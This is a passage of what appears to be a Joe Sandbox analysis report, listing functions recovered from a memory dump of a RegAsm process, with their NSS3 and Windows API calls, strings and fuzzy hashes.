free.MOZGLUE(?), ref: 6C19EEBB
PR_SetError.NSS3(00000000,00000000), ref: 6C19EED0
PR_Unlock.NSS3(?), ref: 6C19EF48
free.MOZGLUE(?), ref: 6C19EF68
PR_SetError.NSS3(00000000,00000000), ref: 6C19EF7D
PK11_DoesMechanism.NSS3(?,?), ref: 6C19EFA4
free.MOZGLUE(?), ref: 6C19EFDA
PR_SetError.NSS3(FFFFE040,00000000), ref: 6C19F055
free.MOZGLUE(?), ref: 6C19F060

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
String ID:
API String ID: 2524771861-0
Opcode ID: 174b3fb85275efd6aaa1ce287bf3da6c6a8ecc74ce8f2f0aca5a938f21c0796b
Instruction ID: 1de63560092a1134393fcdead2d268115a55c72d108df138aad9f86808327078
Opcode Fuzzy Hash: 174b3fb85275efd6aaa1ce287bf3da6c6a8ecc74ce8f2f0aca5a938f21c0796b
Instruction Fuzzy Hash: 208171B1A00209ABDF00DFA5DC85BEE7BB5BF08318F154024ED19A3751E731E964CBA1

Function 6C164CF0 Relevance: 21.2, APIs: 14, Instructions: 237memoryCOMMON

Download Yara Rule

APIs

PK11_SignatureLen.NSS3(?), ref: 6C164D80
PORT_Alloc_Util.NSS3(00000000), ref: 6C164D95
PORT_NewArena_Util.NSS3(00000800), ref: 6C164DF2
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C164E2C
PR_SetError.NSS3(FFFFE028,00000000), ref: 6C164E43
PORT_NewArena_Util.NSS3(00000800), ref: 6C164E58
SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6C164E85
DER_Encode_Util.NSS3(?,?,6C2B05A4,00000000), ref: 6C164EA7
PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6C164F17
DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6C164F45
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C164F62
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C164F7A
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C164F89
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C164FC8

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
String ID:
API String ID: 2843999940-0
Opcode ID: bc76dbb433c6d32ac16c976ae8d72aa7844f0e794ebb5e35df061d81f2286f3d
Instruction ID: 04255219c04d1efa2b5d72b18c93ffd167da639d454619672dbeebe07f3011a5
Opcode Fuzzy Hash: bc76dbb433c6d32ac16c976ae8d72aa7844f0e794ebb5e35df061d81f2286f3d
Instruction Fuzzy Hash: EE81C2719083019FE701CF2AD850B5BB7E4AF94308F1589ADF958DBB40E735E915CB92

Function 6C1A5C10 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 221COMMON

Download Yara Rule

APIs

SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?), ref: 6C1A5C9B
PR_SetError.NSS3(FFFFE043,00000000,?,?,?,?,?), ref: 6C1A5CF4
SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?), ref: 6C1A5CFD
PR_smprintf.NSS3(tokens=[0x%x=<%s>],00000004,00000000,?,?,?,?,?,?), ref: 6C1A5D42
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?), ref: 6C1A5D4E
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C1A5D78
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6C1A5E18
TlsGetValue.KERNEL32 ref: 6C1A5E5E
EnterCriticalSection.KERNEL32(?), ref: 6C1A5E72
PR_Unlock.NSS3(?), ref: 6C1A5E8B

Part of subcall function 6C19F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C19F854
Part of subcall function 6C19F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C19F868
Part of subcall function 6C19F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C19F882
Part of subcall function 6C19F820: free.MOZGLUE(04C483FF,?,?), ref: 6C19F889
Part of subcall function 6C19F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C19F8A4
Part of subcall function 6C19F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C19F8AB
Part of subcall function 6C19F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C19F8C9
Part of subcall function 6C19F820: free.MOZGLUE(280F10EC,?,?), ref: 6C19F8D0

Strings

d, xrefs: 6C1A5C36
tokens=[0x%x=<%s>], xrefs: 6C1A5D3D

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: free$CriticalSection$Delete$DestroyErrorModule$EnterR_smprintfUnlockValue
String ID: d$tokens=[0x%x=<%s>]
API String ID: 2028831712-1373489631
Opcode ID: a588dbce56ca8c5aefdf96bc8f81c2dfc93b9436ebc7516ca443054657eaa694
Instruction ID: 78ac764001aea5900dd2f834ac6dfc5eebfde9af9c3c80a953c21024b4366535
Opcode Fuzzy Hash: a588dbce56ca8c5aefdf96bc8f81c2dfc93b9436ebc7516ca443054657eaa694
Instruction Fuzzy Hash: F77107F8E08601ABEB009FA4DC4576E7279AF5135CF140435EC099AB46EB32E91AC792

Function 6C198F40 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(6C199582), ref: 6C198F5B

Part of subcall function 6C1ABE30: SECOID_FindOID_Util.NSS3(6C16311B,00000000,?,6C16311B,?), ref: 6C1ABE44

PORT_NewArena_Util.NSS3(00000800), ref: 6C198F6A

Part of subcall function 6C1B0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C1587ED,00000800,6C14EF74,00000000), ref: 6C1B1000
Part of subcall function 6C1B0FF0: PR_NewLock.NSS3(?,00000800,6C14EF74,00000000), ref: 6C1B1016
Part of subcall function 6C1B0FF0: PL_InitArenaPool.NSS3(00000000,security,6C1587ED,00000008,?,00000800,6C14EF74,00000000), ref: 6C1B102B

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C198FC3
PK11_GetIVLength.NSS3(-00000001), ref: 6C198FE0
SEC_ASN1DecodeItem_Util.NSS3(?,?,6C27D820,6C199576), ref: 6C198FF9
DER_GetInteger_Util.NSS3(?), ref: 6C19901D
PORT_ZAlloc_Util.NSS3(?), ref: 6C19903E
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C199062
memcpy.VCRUNTIME140(00000024,?,?), ref: 6C1990A2
PORT_ZAlloc_Util.NSS3(?), ref: 6C1990CA
memcpy.VCRUNTIME140(00000018,?,?), ref: 6C1990F0
PR_SetError.NSS3(FFFFE006,00000000), ref: 6C19912D
free.MOZGLUE(00000000), ref: 6C199136
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C199145

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Util$Tag_$AlgorithmAlloc_Arena_Findmemcpy$ArenaDecodeErrorFreeInitInteger_Item_K11_LengthLockPoolcallocfree
String ID:
API String ID: 3626836424-0
Opcode ID: 8a5facc25efc16c9882e7fa9855f845eaa9546cf4d024be1e9baef8390a2e50d
Instruction ID: d39d973b97d40c8394772310621d95fb5cb0ee66a7a088a242fcc6a48abcd3db
Opcode Fuzzy Hash: 8a5facc25efc16c9882e7fa9855f845eaa9546cf4d024be1e9baef8390a2e50d
Instruction Fuzzy Hash: 8051CFB2A042409FEB00CF28DC81B9AB7E8AF95328F054579EC5997741E735E949CB92

Function 6C18ADC0 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageSignInit), ref: 6C18ADE6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C18AE17
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C18AE29

Part of subcall function 6C26D930: PL_strncpyz.NSS3(?,?,?), ref: 6C26D963

PR_LogPrint.NSS3(?,00000000), ref: 6C18AE3F
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C18AE78
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C18AE8A
PR_LogPrint.NSS3(?,00000000), ref: 6C18AEA0

Strings

hKey = 0x%x, xrefs: 6C18AE62, 6C18AE72
(CK_INVALID_HANDLE), xrefs: 6C18AE1F, 6C18AE80
hSession = 0x%x, xrefs: 6C18AE01, 6C18AE11
C_MessageSignInit, xrefs: 6C18ADE1
n&l, xrefs: 6C18AEB8, 6C18AEE6

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageSignInit$n&l
API String ID: 332880674-239574460
Opcode ID: 865045427744fa86d2276bf06a3862a49daa545dfe1b1f04caba6f2438ec412b
Instruction ID: 50ec23dcaff1ef6ef1eddbfa25a550d690ff6695c8ef2933de62098bc711a517
Opcode Fuzzy Hash: 865045427744fa86d2276bf06a3862a49daa545dfe1b1f04caba6f2438ec412b
Instruction Fuzzy Hash: 9731F8B5606208ABCB01DF15DC8CBAE3775AB4670DF444824ED096BBC2DB34A848CFB5

Function 6C182DD0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitPIN), ref: 6C182DF6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C182E24
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C182E33

Part of subcall function 6C26D930: PL_strncpyz.NSS3(?,?,?), ref: 6C26D963

PR_LogPrint.NSS3(?,00000000), ref: 6C182E49
PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C182E68
PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C182E81

Strings

(CK_INVALID_HANDLE), xrefs: 6C182E2C
pPin = 0x%p, xrefs: 6C182E63
hSession = 0x%x, xrefs: 6C182E0E, 6C182E1E
n&l, xrefs: 6C182E99, 6C182EC4
C_InitPIN, xrefs: 6C182DF1
ulPinLen = %d, xrefs: 6C182E7C

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPin = 0x%p$ ulPinLen = %d$ (CK_INVALID_HANDLE)$C_InitPIN$n&l
API String ID: 1003633598-2354343642
Opcode ID: 8e33fecde0db677d94a3283f0144734d4e59273b6ad8d3d75a60117a9f25f12e
Instruction ID: 8a6e277c0acc77b1c4a02195e6fe046dc20237c0617615c3b459b7e4264e4637
Opcode Fuzzy Hash: 8e33fecde0db677d94a3283f0144734d4e59273b6ad8d3d75a60117a9f25f12e
Instruction Fuzzy Hash: 8631E7B5606218ABDB11DB15DD8CB4A3775EB4631CF084424EC09ABB92DB30A848CFB9

Function 6C186EF0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DigestUpdate), ref: 6C186F16
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C186F44
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C186F53

Part of subcall function 6C26D930: PL_strncpyz.NSS3(?,?,?), ref: 6C26D963

PR_LogPrint.NSS3(?,00000000), ref: 6C186F69
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6C186F88
PR_LogPrint.NSS3( ulPartLen = %d,?), ref: 6C186FA1

Strings

(CK_INVALID_HANDLE), xrefs: 6C186F4C
hSession = 0x%x, xrefs: 6C186F2E, 6C186F3E
ulPartLen = %d, xrefs: 6C186F9C
C_DigestUpdate, xrefs: 6C186F11
pPart = 0x%p, xrefs: 6C186F83
n&l, xrefs: 6C186FB9, 6C186FE7

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPart = 0x%p$ ulPartLen = %d$ (CK_INVALID_HANDLE)$C_DigestUpdate$n&l
API String ID: 1003633598-693278625
Opcode ID: 626f1ed25b7bcb235c663db62292c541c6d856b65f88580aa11cc70d43e7c714
Instruction ID: 51a1283612904378d9a45540659986d5b16fbf291519e9cf6d6c0c4e7132f961
Opcode Fuzzy Hash: 626f1ed25b7bcb235c663db62292c541c6d856b65f88580aa11cc70d43e7c714
Instruction Fuzzy Hash: 7331D77562614C9FDB00DB25DD8CB5A37B1EB4231DF084465EC09ABA92DB30E948CFE5

Function 6C14AF30 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6C14AF47

Part of subcall function 6C219090: TlsGetValue.KERNEL32 ref: 6C2190AB
Part of subcall function 6C219090: TlsGetValue.KERNEL32 ref: 6C2190C9
Part of subcall function 6C219090: EnterCriticalSection.KERNEL32 ref: 6C2190E5
Part of subcall function 6C219090: TlsGetValue.KERNEL32 ref: 6C219116
Part of subcall function 6C219090: LeaveCriticalSection.KERNEL32 ref: 6C21913F

FreeLibrary.KERNEL32(?), ref: 6C14AF6D
free.MOZGLUE(?), ref: 6C14AFA4
free.MOZGLUE(?), ref: 6C14AFAA
PR_ExitMonitor.NSS3 ref: 6C14AFB5
PR_LogPrint.NSS3(%s decr => %d,?,?), ref: 6C14AFF5
PR_ExitMonitor.NSS3 ref: 6C14B005
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C14B014
PR_LogPrint.NSS3(Unloaded library %s,?), ref: 6C14B028
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C14B03C

Strings

%s decr => %d, xrefs: 6C14AFF0
Unloaded library %s, xrefs: 6C14B023

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: MonitorValue$CriticalEnterErrorExitPrintSectionfree$FreeLeaveLibrary
String ID: %s decr => %d$Unloaded library %s
API String ID: 4015679603-2877805755
Opcode ID: b7839ac45db841f398afb3f956b4933dc7d80147b0b6b482a467df82c5cb1868
Instruction ID: 467c370e0753ecc8a38537e1a3d7d70d279debb4592c8a4c7474eb39df796cdb
Opcode Fuzzy Hash: b7839ac45db841f398afb3f956b4933dc7d80147b0b6b482a467df82c5cb1868
Instruction Fuzzy Hash: 403134B4B04111ABEB00EF64DC44A1EB7B5EB1570CB1A8175EC0687E81F732E868C7E6

Function 6C196C30 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 58stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C19781D,00000000,6C18BE2C,?,6C196B1D,?,?,?,?,00000000,00000000,6C19781D), ref: 6C196C40
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C19781D,?,6C18BE2C,?), ref: 6C196C58
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C19781D), ref: 6C196C6F
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C196C84
PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C196C96

Part of subcall function 6C141240: TlsGetValue.KERNEL32(00000040,?,6C14116C,NSPR_LOG_MODULES), ref: 6C141267
Part of subcall function 6C141240: EnterCriticalSection.KERNEL32(?,?,?,6C14116C,NSPR_LOG_MODULES), ref: 6C14127C
Part of subcall function 6C141240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C14116C,NSPR_LOG_MODULES), ref: 6C141291
Part of subcall function 6C141240: PR_Unlock.NSS3(?,?,?,?,6C14116C,NSPR_LOG_MODULES), ref: 6C1412A0

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C196CAA

Strings

extern:, xrefs: 6C196C7E
NSS_DEFAULT_DB_TYPE, xrefs: 6C196C91
dbm:, xrefs: 6C196C3A
sql:, xrefs: 6C196C52
dbm, xrefs: 6C196CA4
rdb:, xrefs: 6C196C69

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
API String ID: 4221828374-3736768024
Opcode ID: 8398b45c7475ed11d101555f03cefcbce8ff613330ca5d5748d499f8732ec31b
Instruction ID: 9607eeb7922de33e97affd7a29c79806ca17fd59a0a9d46c3c4f054f1b846e6f
Opcode Fuzzy Hash: 8398b45c7475ed11d101555f03cefcbce8ff613330ca5d5748d499f8732ec31b
Instruction Fuzzy Hash: A801D6F170230927FA4027BA6D8AF66355C9F41958F140431FF08E09C1FB96E514C0F5

Function 6C1A4E60 Relevance: 19.7, APIs: 13, Instructions: 186COMMON

Download Yara Rule

APIs

PR_SetErrorText.NSS3(00000000,00000000,?,6C1678F8), ref: 6C1A4E6D

Part of subcall function 6C1409E0: TlsGetValue.KERNEL32(00000000,?,?,?,6C1406A2,00000000,?), ref: 6C1409F8
Part of subcall function 6C1409E0: malloc.MOZGLUE(0000001F), ref: 6C140A18
Part of subcall function 6C1409E0: memcpy.VCRUNTIME140(?,?,00000001), ref: 6C140A33

PR_SetError.NSS3(FFFFE09A,00000000,?,?,?,6C1678F8), ref: 6C1A4ED9

Part of subcall function 6C195920: NSSUTIL_ArgHasFlag.NSS3(flags,printPolicyFeedback,?,?,?,?,?,?,00000000,?,00000000,?,6C197703,?,00000000,00000000), ref: 6C195942
Part of subcall function 6C195920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckIdentifier,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C197703), ref: 6C195954
Part of subcall function 6C195920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckValue,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C19596A
Part of subcall function 6C195920: SECOID_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C195984
Part of subcall function 6C195920: NSSUTIL_ArgGetParamValue.NSS3(disallow,00000000), ref: 6C195999
Part of subcall function 6C195920: free.MOZGLUE(00000000), ref: 6C1959BA
Part of subcall function 6C195920: NSSUTIL_ArgGetParamValue.NSS3(allow,00000000), ref: 6C1959D3
Part of subcall function 6C195920: free.MOZGLUE(00000000), ref: 6C1959F5
Part of subcall function 6C195920: NSSUTIL_ArgGetParamValue.NSS3(disable,00000000), ref: 6C195A0A
Part of subcall function 6C195920: free.MOZGLUE(00000000), ref: 6C195A2E
Part of subcall function 6C195920: NSSUTIL_ArgGetParamValue.NSS3(enable,00000000), ref: 6C195A43

SECMOD_FindModule.NSS3(?,?,?,?,?,?,?,?,?,6C1678F8), ref: 6C1A4EB3

Part of subcall function 6C1A4820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C1A4EB8,?,?,?,?,?,?,?,?,?,?,6C1678F8), ref: 6C1A484C
Part of subcall function 6C1A4820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C1A4EB8,?,?,?,?,?,?,?,?,?,?,6C1678F8), ref: 6C1A486D
Part of subcall function 6C1A4820: PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6C1A4EB8,?), ref: 6C1A4884

SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C1678F8), ref: 6C1A4EC0

Part of subcall function 6C1A4470: TlsGetValue.KERNEL32(00000000,?,6C167296,00000000), ref: 6C1A4487
Part of subcall function 6C1A4470: EnterCriticalSection.KERNEL32(?,?,?,6C167296,00000000), ref: 6C1A44A0
Part of subcall function 6C1A4470: PR_Unlock.NSS3(?,?,?,?,6C167296,00000000), ref: 6C1A44BB

TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C1678F8), ref: 6C1A4F16
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C1678F8), ref: 6C1A4F2E
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6C1678F8), ref: 6C1A4F40
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C1678F8), ref: 6C1A4F6C
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6C1678F8), ref: 6C1A4F80
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C1678F8), ref: 6C1A4F8F
PK11_UpdateSlotAttribute.NSS3(?,6C27DCB0,00000000), ref: 6C1A4FFE
PK11_UserDisableSlot.NSS3(0000001E), ref: 6C1A501F
SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,6C1678F8), ref: 6C1A506B

Memory Dump Source

Source File: 00000003.00000002.2463989577.000000006C0D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C0D0000, based on PE: true

Associated: 00000003.00000002.2463915442.000000006C0D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2465906791.000000006C26F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466217548.000000006C2AE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466344202.000000006C2AF000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2466405164.000000006C2B0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.2467016307.000000006C2B5000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c0d0000_RegAsm.jbxd

Similarity

API ID: Value$Param$CriticalEnterErrorFlagModuleSectionUnlockfree$DestroyK11_Slotstrcmp$AttributeDisableFindInitTextUpdateUsermallocmemcpy
String ID:
API String ID: 560490210-0
Opcode ID: 8afba2e9e73cc14fe3ab782c78225a6987eeda65560d4318f2baa1c0562196cb
Instruction ID: 4a051388fd5f9da6efaffcd09453466b87f39410999d9b692a44b2b343f25316
